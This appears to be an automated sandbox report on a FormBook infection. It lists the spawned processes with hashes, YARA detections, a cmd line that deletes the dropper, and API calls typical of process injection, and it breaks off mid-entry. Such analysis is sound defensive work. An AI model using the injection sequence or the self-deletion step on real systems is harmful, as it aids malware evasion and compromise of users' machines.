                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:13:12:17
                                        Start date:08/04/2021
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Imagebase:0x4c0000
                                        File size:45152 bytes
                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Start time:13:12:20
                                        Start date:08/04/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff693d90000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:13:12:35
                                        Start date:08/04/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe
                                        Imagebase:0x13d0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Start time:13:12:42
                                        Start date:08/04/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                        Imagebase:0x920000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:13:12:43
                                        Start date:08/04/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7ecfc0000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                          Executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: 8-9v$8-9v$:H}I
                                          • API String ID: 0-856856487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: |;-,$}tQ$}tQ
                                          • API String ID: 0-2222723744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: 2W%$Daz
                                          • API String ID: 0-961997077
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: _t'~$_t'~
                                          • API String ID: 0-3244676642
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: _t'~$_t'~
                                          • API String ID: 0-3244676642
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07D56ED7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: InformationProcessQuery
                                          • String ID:
                                          • API String ID: 1778838933-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07D56ED7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: InformationProcessQuery
                                          • String ID:
                                          • API String ID: 1778838933-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: !eT+
                                          • API String ID: 0-96305052
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: ~MJ
                                          • API String ID: 0-3276334052
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92133fec8fa783d12a1a6f5d6e71e41c929fc81c9bfb3213581f342fcbfd2a33
                                          • Instruction ID: 3eb83eb9103fbbe4f108fbb6d867f947f89f876fd83606a7967b7983c0c3cc07
                                          • Opcode Fuzzy Hash: 92133fec8fa783d12a1a6f5d6e71e41c929fc81c9bfb3213581f342fcbfd2a33
                                          • Instruction Fuzzy Hash: CCD13A71D0530ADFCB04CFAAC8818AEFBB2FF89301B18C559D506AB254D734AA42CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9aa3b3d770f5f4a0be3e653123bfe892a8a4ae19406b9c49730229b76af8bb7
                                          • Instruction ID: a1a9ae45b4df5a4526a998a7bcd7a9b6841500672f1f305c34262de4f3fc90c6
                                          • Opcode Fuzzy Hash: a9aa3b3d770f5f4a0be3e653123bfe892a8a4ae19406b9c49730229b76af8bb7
                                          • Instruction Fuzzy Hash: FDD13B75D0530ADFCB04CFA9C8818AEFBB2FF89301B18C559C516AB254D734AA42CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 86d34383932d742f5d6e14eadce77a6eea795d34b4afe218b9fbc063ba1a90a5
                                          • Instruction ID: ff5e50f8763567c9411823e4aa5f74f78e642c52fcf34fe968891cb72b11e34e
                                          • Opcode Fuzzy Hash: 86d34383932d742f5d6e14eadce77a6eea795d34b4afe218b9fbc063ba1a90a5
                                          • Instruction Fuzzy Hash: D591C5B4E042199FDF04DFA5D9455AEFBB2FF89300F109929D816A7254DB349942CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3809d4bdcc416fb7ff54795069f8cf019b2b7b3fba642c14f6beadf73cc526de
                                          • Instruction ID: f2415ad75b4b57ee1e9d32e8242750f2d838f39525594a491057a6b3aab3148b
                                          • Opcode Fuzzy Hash: 3809d4bdcc416fb7ff54795069f8cf019b2b7b3fba642c14f6beadf73cc526de
                                          • Instruction Fuzzy Hash: A181E175E003098FCB08CFEAC8849DEFBB2EF89300F24952AD51AAB254D7349946CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3fe2f9fe05f2dc565d360ebf8ca7ba53eb750fc5c2f5e25155d568d03ed44ff3
                                          • Instruction ID: ecfb0ee2388c76519044c1e4e81239c8b351084842cc51c02f158a538c9558b6
                                          • Opcode Fuzzy Hash: 3fe2f9fe05f2dc565d360ebf8ca7ba53eb750fc5c2f5e25155d568d03ed44ff3
                                          • Instruction Fuzzy Hash: 577127B0E052598FCB04DFF9C585A9EFBF3AF88315F19C169D614A7345EB3099428B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1fa15deb1fbda5325e58140326d0c571d67adefbe95bda6a3fa9dbedb08394f2
                                          • Instruction ID: be51ba6a8e57f83ebb3d65e903eaf0a943c8aad18b8fa45b1237d13771704808
                                          • Opcode Fuzzy Hash: 1fa15deb1fbda5325e58140326d0c571d67adefbe95bda6a3fa9dbedb08394f2
                                          • Instruction Fuzzy Hash: 3F61C271E0021D8BDF05DFFAC840ADEBBB3AF98315F28C129DA14AB255EB315942CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac0b0c35d344aab42d941ac8973a2a42e59b4c9464781f90b334f6fcc56c2089
                                          • Instruction ID: ab2ab91dec7ed17301e5bbe8ebd0041f077a8d346c1d91de820406efe3d1a64b
                                          • Opcode Fuzzy Hash: ac0b0c35d344aab42d941ac8973a2a42e59b4c9464781f90b334f6fcc56c2089
                                          • Instruction Fuzzy Hash: 8471AE75E002088FDB14CFA9C984A9DFBB2FF89315F158029EA09AB355EB349842CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc805657e586edc9948f24d9207fb6588f468e71a86af7c0a8140d052f50a844
                                          • Instruction ID: d0f187f10f5030698e346cade0a12581fa4396f34a11be4a8cd5a0322b493d67
                                          • Opcode Fuzzy Hash: fc805657e586edc9948f24d9207fb6588f468e71a86af7c0a8140d052f50a844
                                          • Instruction Fuzzy Hash: A661E175D0021DCBCB15DFA9C940ADEFBB2BF89301F1485A9D608BB215EB315A86CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ce586cd9cbc42d9be2d9a7df7cc97b4be8994bb48a46c2c3caf3561f97b053cf
                                          • Instruction ID: 315854d7cb822181a18057b5860e7af99def66031429a865c94e4c28a6831e05
                                          • Opcode Fuzzy Hash: ce586cd9cbc42d9be2d9a7df7cc97b4be8994bb48a46c2c3caf3561f97b053cf
                                          • Instruction Fuzzy Hash: 24510975E0520ADFCB44CFA9C9819AEFBF2FB88301F1485AAD518EB354D7349A418F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d3cac7257c8122e17d92668ec00de27d02a98b1fedbe62c290ac8bda28fe6181
                                          • Instruction ID: 00a9d7bab9c3056f6cb2fb167e1d7e8b849717f930bb9c6adb297c0b5233afa7
                                          • Opcode Fuzzy Hash: d3cac7257c8122e17d92668ec00de27d02a98b1fedbe62c290ac8bda28fe6181
                                          • Instruction Fuzzy Hash: E9411A71E056188FEB58CFAAC850B9EBBB3FFC9200F04C5AAC908AB254DB304945CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: edc64cf47768fa27f84919542ee3149b71b3dad87b37cbbf916bab044a055de4
                                          • Instruction ID: 5d96b1860cb84142cf070d412398269999c3f32f334cac530b5aab09a6ffb2ca
                                          • Opcode Fuzzy Hash: edc64cf47768fa27f84919542ee3149b71b3dad87b37cbbf916bab044a055de4
                                          • Instruction Fuzzy Hash: B62119B5E056588BDB18CFAAD8406DEFBB3AFC9310F18C16AD509AA258DB340946CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 816b7bd92805abe56ceac03ae9e6fda16e9ae6464bc37b9c5de6c773c24b0a94
                                          • Instruction ID: e3718adf1e84666a2c453b9f66ce795bfc9bb9901fbb65157894cdf360f98078
                                          • Opcode Fuzzy Hash: 816b7bd92805abe56ceac03ae9e6fda16e9ae6464bc37b9c5de6c773c24b0a94
                                          • Instruction Fuzzy Hash: CF21A8B1E056198BEB58CF6BDC4069EFBF7BBC8200F04C57AD908A7254EB3419468F51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 01676BF0
                                          • GetCurrentThread.KERNEL32 ref: 01676C2D
                                          • GetCurrentProcess.KERNEL32 ref: 01676C6A
                                          • GetCurrentThreadId.KERNEL32 ref: 01676CC3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 01676BF0
                                          • GetCurrentThread.KERNEL32 ref: 01676C2D
                                          • GetCurrentProcess.KERNEL32 ref: 01676C6A
                                          • GetCurrentThreadId.KERNEL32 ref: 01676CC3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D5B216
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0167BE0E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0167DD8A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0167DD8A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01676E3F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D5ADE8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 07D5A5E6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01676E3F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 07D5A5E6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D5AEC8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01676E3F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07D5539B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0167BE89,00000800,00000000,00000000), ref: 0167C09A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07D5539B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: e1ab497b462c5ff32e0fbcaed2b062a13e31f054e2c8aef28686367d5d44e268
                                          • Instruction ID: 9baab8745a2ec1cc0079a7bf1e701685748b8363a5abcd7bcff3d989b187d6ea
                                          • Opcode Fuzzy Hash: e1ab497b462c5ff32e0fbcaed2b062a13e31f054e2c8aef28686367d5d44e268
                                          • Instruction Fuzzy Hash: 5E21F6B19006599FDF10CF9AD484BDEFBF4FB48324F148429E959A7240D378AA44CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0167BE89,00000800,00000000,00000000), ref: 0167C09A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: a65ff96d34c00045b99f0a89b6cf514e0a7cd90faa212ff44450644608e4125c
                                          • Instruction ID: cbfb46b3c80ca859585089d86a073f6d9039a6952a4e5ce56790d19884b00614
                                          • Opcode Fuzzy Hash: a65ff96d34c00045b99f0a89b6cf514e0a7cd90faa212ff44450644608e4125c
                                          • Instruction Fuzzy Hash: B91114B2D002498FDB10CFAAD884BDEFBF4AB89314F15851ED955B7600C375A949CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D5AD06
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 83154386d5f5bbeb0d1b437931363879544de9415c562944c4f6e6442d22f82c
                                          • Instruction ID: 94cd6ad5151c0fcb16bf89b80da3944f09bf8276d2cf47cd006f253c1cf8d601
                                          • Opcode Fuzzy Hash: 83154386d5f5bbeb0d1b437931363879544de9415c562944c4f6e6442d22f82c
                                          • Instruction Fuzzy Hash: FD1156B19042599BCF10DFAAC844BDFBFF5AF88324F14881AD915A7240C775A944CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OutputDebugStringW.KERNELBASE(00000000), ref: 07D58B18
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: DebugOutputString
                                          • String ID:
                                          • API String ID: 1166629820-0
                                          • Opcode ID: 2588f2af95552bc17693d1578b4f3551f885120cbd0e91500c93bfa34c92cbaf
                                          • Instruction ID: fd466eb110c0d032ad9960a9d074bd26c83fdce81fb6b79f560166291f70c44b
                                          • Opcode Fuzzy Hash: 2588f2af95552bc17693d1578b4f3551f885120cbd0e91500c93bfa34c92cbaf
                                          • Instruction Fuzzy Hash: 43114FB5D0065A9BCB00CFAAD544BDEFBB4FB48324F04812AD819A3600C774AA40CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: dba0723b39644e35a59e80a792b1eff46987fdd2adf04571e7fc1682f91af3dc
                                          • Instruction ID: a2a6f601e2d54b3ce79b5ff13d809eee7e48e0359f67dc7ebfbc2194493b81f2
                                          • Opcode Fuzzy Hash: dba0723b39644e35a59e80a792b1eff46987fdd2adf04571e7fc1682f91af3dc
                                          • Instruction Fuzzy Hash: 861188B19042588BCF10DFAAC4487EEFBF5AF88318F18881AC515A7200C774A944CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OutputDebugStringW.KERNELBASE(00000000), ref: 07D58B18
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID: DebugOutputString
                                          • String ID:
                                          • API String ID: 1166629820-0
                                          • Opcode ID: aa0883a70388cfabfb7c8508d7ca65691c0a695a9d71546de7ded92d5a8c818a
                                          • Instruction ID: cd38435c88a92e5b0b3461520233512b562af329a8c2fd4a697211fcbeba2631
                                          • Opcode Fuzzy Hash: aa0883a70388cfabfb7c8508d7ca65691c0a695a9d71546de7ded92d5a8c818a
                                          • Instruction Fuzzy Hash: 311120B5D0065A9BCB00CF9AD544B9EFBB8FB48324F14811AD819A3640C774AA44CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
